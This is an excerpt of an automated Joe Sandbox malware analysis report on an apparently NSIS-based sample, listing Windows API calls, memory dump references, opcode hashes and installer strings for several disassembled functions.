                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                      • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                      • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                      • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                      • String ID: !N~
                                                                                                                                                                                                                                                                                                      • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                      • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                      • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                      • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                      • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                      • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                                      • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                      • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                      • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                      • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4